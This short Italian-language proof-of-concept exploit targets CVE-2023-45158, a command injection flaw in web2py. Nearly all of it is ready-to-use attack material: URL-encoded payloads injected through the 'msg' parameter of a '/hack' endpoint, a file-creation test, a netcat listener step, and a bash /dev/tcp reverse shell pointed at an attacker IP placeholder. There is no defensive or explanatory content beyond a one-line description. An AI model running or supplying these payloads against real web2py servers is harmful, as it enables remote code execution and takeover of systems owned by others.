
Exploit proof-of-concept per CVE-2023-45158, una vulnerabilità di command injection in web2py. Dimostra l'esecuzione di codice remoto tramite richieste HTTP appositamente create, inclusa la creazione di file e payload di reverse shell.
cd web2py
python3 web2py.py
http://<IP-ADDRESS>:8000/hack?msg=%27%3B<YOUR-COMMAND>%3B%27. Sostituisci <IP-ADDRESS> e <YOUR-COMMAND> con i tuoi valori.http://<IP-ADDRESS>:8000/hack?msg=%27%3Btouch%20hack%3B%27
Sulla macchina dell'attaccante, esegui nc -l 127.0.0.1 8080
Vai all'URL http://<IP-ADDRESS>:8000/hack?msg=%27%3Bbash%20-i%20>%26/dev/tcp/<ATTACKER-IP>/8080%200>%26%201%3B%27. Sostituisci <ATTACKER-IP>.